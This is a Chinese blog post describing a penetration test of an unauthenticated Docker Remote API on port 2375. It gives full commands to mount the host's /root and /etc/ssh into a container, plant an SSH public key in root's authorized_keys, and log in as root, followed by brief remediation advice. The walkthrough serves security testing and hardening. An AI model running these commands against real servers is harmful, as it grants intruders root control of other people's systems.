Docker Remote API未授权访问

已于 2022-12-16 11:00:47 修改
阅读量1.2k 收藏 1
点赞数
分类专栏: 工程项目渗透 文章标签: docker 服务器 系统安全 安全
于 2022-12-16 10:47:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyink001/article/details/128339352
版权

漏洞起因
使用docker swarm的时候,管理的docker 节点上会开放一个TCP端口2375,绑定在0.0.0.0上,http访问会返回 404 page not found ,其实这是 Docker Remote API,可以执行docker命令

漏洞风险
Docker daemon api是使用url代替命令行来操作docker,docker swarm 是docker下的集群管理工具,在开放2375端口来监听集群容器时,会调用这个api,可以执行docker命令,root权限启动docker情况下可直接可以通过创建容器映射ssh配置文件,配置自己的key公钥,使用root+key私钥连接服务器。

渗透过程
用awvs扫描项目,发现了一个Docker Engine API 无需身份验证即可访问漏洞
在这里插入图片描述
浏览器访问一下http://127.0.0.1:2375/info ,确实有东西
在这里插入图片描述
随便找一个装有docker的虚拟机连接docker试试,看到了创建的docker容器(ps直接看到内容,说明这个主机的2375是没有ssl验证的,基本满足入侵要求)

# docker -H tcp://10.20.17.215:2375 ps

在这里插入图片描述
获取服务器root权限思路就比较明确了
创建一个容器
映射ssh配置文件目录
进入容器

# docker -H tcp://127.0.0.1:2375 run --rm -it --entrypoint bash -v /root:/tmp/root -v /etc/ssh:/tmp/ssh_etc -v /var/log:/tmp/log ubuntu

先进入容器,检查一下是否启用了root用户

# cat /tmp/ssh_etc/sshd_config

在这里插入图片描述
在自己的机器上生成一对新的key

# ssh-keygen -t rsa -C "hello@world.com"
# Enter file in which to save the key (/root/.ssh/id_rsa): /home/id_rsa 
# (其他选项回车即可)

在这里插入图片描述
查看/home/id_rsa.pub内容

# cat /home/id_rsa.pub

在这里插入图片描述
在docker容器中注入ssh pub key

# cat >> /tmp/root/.ssh/authorized_keys <<EOF
>ssh-rsa AAA....     # 这里粘贴你刚刚在自己机器生成的/tmp/id_rsa.pub
>EOF

使用生成的/home/id_ras私钥登录服务器

ssh -i /home/id_rsa root@127.0.0.1

在这里插入图片描述
至此,拿到目标服务器root账号权限,渗透结束。

修复建议
1.对2375端口做网络访问控制,如ACL控制,或者访问规则;
2.通过CA认证方式使用Remote API,参考:https://docs.docker.com/engine/security/https/

lyink001
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
myJavaHe的博客
03-15 2065
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
配置开启Docker2375远程连接与解决Docker授权访问漏洞
Sherry
11-13 4634
配置开启Docker2375远程连接与解决Docker授权访问漏洞。
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证_docker远程接口授权访问漏洞怎么解决
最新发布
2401_84968016的博客
05-12 352
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Docker API 授权访问漏洞
qq_42383069的博客
05-09 7696
Docker API 授权访问漏洞 1、漏洞简介 在Docker的部署文档中,由于默认存在某些不安全的配置样例,导致2375管理端口对外,该授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。 2、漏洞原理 利用 Docker 节点上开放的 TCP 端口 2375 远程执行 Docker 命令,进而可获取服务器 Root 权限。 3、漏洞环境搭建 这里我们直接使用 vluhub 环境 cd vulhub/docker/una
Docker Remote API 授权访问
Fly_鹏程万里
01-20 1669
简介 docker 在使用集群管理(如:Kubernetes,swarm)时,要使用remote api对节点进行管理。remote api无认证时的默认端口是2375(需要TLS认证默认登录是2376)。 remote api默认是可以不需要认证能直接访问,能直接对docker进行操作,如新建容器,删除容器,查看镜像容器信息等操作。 remote api操作方法可以参考:docker官方文档...
关于docker remote api授权访问漏洞的学习与研究
07-16 614
漏洞介绍: 该授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerdocker swarm是docker下的分布化应用的本地集群,在开放2375监听集群容器时,会调用这个api url输入ip:2375/version就会列出基本信息,和docker vers...
Docker Remote API 授权漏洞全球探测1
08-03
漏洞发现的起因是,有一位同学在使用 docker swarm 的时候,发现了管理的 docker 节点上会开放一个 TCP 端口 2375,绑定在 0.0.0.
DockerDocker Remote API 访问控制
01-09
Docker的远程调用 API 接口存在授权访问漏洞,至少应限制外网访问。建议使用 Socket 方式访问,监听内网 ip,docker daemon 启动方式如下: [root@localhost ~]# vim /usr/lib/systemd/system/docker.service ##...
基于Docker的MongoDB实现授权访问的方法
09-09
主要介绍了基于Docker的MongoDB实现授权访问的方法,需要的朋友可以参考下
docker-api:Docker Remote API的轻量级Ruby客户端
03-31
安装将此行添加到应用程序的Gemfile中: gem 'docker-api' 然后运行: $ bundle install 另外,如果您只想在脚本中使用gem,则可以运行: $ gem install docker-api 最后,只需使用此gem将require 'docker'添加到...
1. 离线安装docker; 2. 实现docker-cert配置,修复docker remote API漏洞;.zip
04-30
docker安装 docker安装方法有多种,下面列举在Windows和Linux系统中的安装步骤:12 ...可以通过访问Docker官网的CentOS下载地址获取帮助文档,按步骤进行安装。 安装Docker CE(Community Edition)
Docker API 授权访问 getshell——漏洞复现
W小哥
10-22 4720
一、Docker介绍 Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台Docker。 二、Docker API 授权访问介绍 Docker Remote API 是一个取代远程命令行界面(rcli)的REST API。 存在问题的版本分别为 1.3 和 1.6 因为权限控制等问题导致可以通过 docker client 或
docker api授权导致rce 漏洞修复
core815的专栏
05-26 1513
docker api授权导致rce 漏洞修复
DOCKER REMeOTE API 授权访问漏洞复现
weixin_43061533的博客
12-01 706
0x01 漏洞简述 Docker Remote API是一个取代远程命令行界面(rcli)的REST API。本文中,我们将使用命令行工具cURL来处理url相关操作。cURL可以发送请求、获取以及发送数据、检索信息。 0x02 风险等级 严漏洞的评定结果如下: 评定方式 等级 威胁等级 严重 影响面 广泛 0x03 漏洞详情 Dockerdocker.service设置为0.0.0.0/lib/systemd/system/docker.service,导致任意访问 Docker没有使用iptables
Docker授权访问漏洞
Kevin's Blog
08-03 8005
文章目录一、漏洞介绍1.1 漏洞成因1.2 漏洞概况二、攻击过程2.1 信息收集2.2 漏洞探测2.3 漏洞利用三、防御方法 一、漏洞介绍 1.1 漏洞成因   又叫Docker Remote API授权访问漏洞,此API主要目的是取代命令行界面;Dcoker swarm是docker下的分布化应用的本地集群,开放2375监听容器时,会调用这个API,方便的docker集群管理和扩展(绑定在0.0.0.0上,http会返回404page not fount) 1.2 漏洞概况 fofa搜索全国端口占有概况
Docker授权API逃逸
qq_69775412的博客
04-19 2217
一、Docker授权介绍: dockerswarm: docker swarm是一个将docker集群变成单一虚拟的dockerhost工具,使用标准的DockerAPI,能够方便docker集群的管理和扩展,由docker官方提供,具体的大家可以看官网介绍:https://docs.docker.com/engine/swarm/ 漏洞起因: 在使用dockerswarm的时候,发现管理的docker节点上会开放一个tcp端口2375,并且绑定在0.0.0.0上,http访问会返回404p...
云安全笔记-Docker daemon api 授权访问漏洞复现及利用
NoooEmotion的博客
02-07 1380
授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker
DockerDocker Registry HTTP API
小子宝丁的博客
04-22 1516
Docker Registry HTTP API 是面向 Docker Registry v2 的 API,用于与 Registry 进行通信以管理 Docker 镜像。
docker remote api授权访问漏洞批量扫描脚本
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
10-25 660
docker remote api授权访问漏洞批量扫描脚本 # python3 # 5wimming import queue import threading import time import requests import json from docker import Client thread_lock = threading.Lock() out_result = [] # 输出列表 multi = 7 # 线程数量 queueSize = 10 # 申请队列空间大小,值一般略大于m
Docker Registry 授权访问漏洞
04-25
Docker Registry 授权访问漏洞是指攻击者可以在授权的情况下访问或者下载镜像。这种漏洞的危害性较大,因为攻击者可以使用被盗取的镜像发起攻击,造成不可预测的后果。要解决这个问题,可以通过限制访问 Docker Registry 的权限、加强密码强度,并且定期更新 Docker Registry 的软件等方式来保障安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值